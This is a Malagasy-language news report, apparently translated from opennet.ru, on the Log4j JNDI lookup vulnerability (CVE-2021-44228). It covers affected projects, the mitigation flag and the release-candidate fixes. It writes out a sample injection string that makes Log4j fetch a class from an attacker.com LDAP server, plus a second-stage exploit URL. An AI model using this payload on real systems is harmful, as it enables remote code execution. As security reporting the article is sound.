Ao amin'ny Apache Log4j, rafitra malaza amin'ny fandrindrana ny fidirana amin'ny rindranasa Java, dia hita fa misy vulnerable izay mamela ny kaody tsy manara-penitra hotanterahina rehefa misy sanda voarafitra manokana amin'ny endrika β{jndi:URL}β voasoratra ao amin'ny log. Ny fanafihana dia azo atao amin'ny rindranasa Java izay mirakitra ny soatoavina azo avy amin'ny loharano ivelany, ohatra, rehefa mampiseho soatoavina misy olana amin'ny hafatra diso.
Marihina fa saika ny tetikasa rehetra mampiasa rafitra toa an'i Apache Struts, Apache Solr, Apache Druid na Apache Flink dia voakasik'ilay olana, anisan'izany ny Steam, Apple iCloud, mpanjifa sy mpizara Minecraft. Antenaina fa ny vulnerability dia mety hitarika amin'ny onjam-panafihana faobe amin'ny rindranasa orinasa, mamerina ny tantaran'ny vulnerability manakiana ao amin'ny rafitra Apache Struts, izay, araka ny tombantombana henjana, dia ampiasaina amin'ny fampiharana tranonkala amin'ny 65% ββamin'ny Fortune Orinasa 100. Tafiditra ao anatin'izany ny fanandramana mijery ny tambajotra ho an'ny rafitra marefo.
Miharatsy ny olana noho ny fisian'ny exploit miasa efa navoaka, saingy ny fanamboarana ireo sampana stable dia tsy mbola voatambatra. Tsy mbola nomena ny famantarana CVE. Ny fanamboarana dia tsy misy afa-tsy ao amin'ny sampana fitsapana log4j-2.15.0-rc1. Ho vahaolana amin'ny fanakanana ny vulnerability dia asaina mametraka ny mari-pamantarana log4j2.formatMsgNoLookups ho marina.
Ny olana dia noho ny fisian'ny log4j manohana ny fanodinana saron-tava manokana "{}" amin'ny tsipika mivoaka amin'ny log, izay ahafahan'ny JNDI (Java Naming sy Directory Interface) fangatahana. Ny fanafihana dia miainga amin'ny fandefasana tady miaraka amin'ny fanoloana "${jndi:ldap://attacker.com/a}", amin'ny fanodinana izay log4j dia handefa fangatahana LDAP ho an'ny lalana mankany amin'ny kilasy Java mankany amin'ny server attacker.com . Ny lalana naverin'ny mpizara mpanafika (ohatra, http://second-stage.attacker.com/Exploit.class) dia ho fenoina sy hotanterahina ao anatin'ny tontolon'ny dingana ankehitriny, izay ahafahan'ny mpanafika manatanteraka kaody tsy misy dikany amin'ny rafitra misy ny zon'ny fampiharana ankehitriny.
Fanampiny 1: Ny vulnerability dia nomena ny famantarana CVE-2021-44228.
Fanampiny 2: Misy fomba iray hialana amin'ny fiarovana nampian'ny famoahana log4j-2.15.0-rc1. Nisy fanavaozana vaovao, log4j-2.15.0-rc2, natolotra miaraka amin'ny fiarovana feno kokoa amin'ny vulnerability. Ny kaody dia manasongadina ny fiovana mifandraika amin'ny tsy fisian'ny fampitsaharana tsy ara-dalΓ na raha toa ka mampiasa URL JNDI diso endrika.
Source: opennet.ru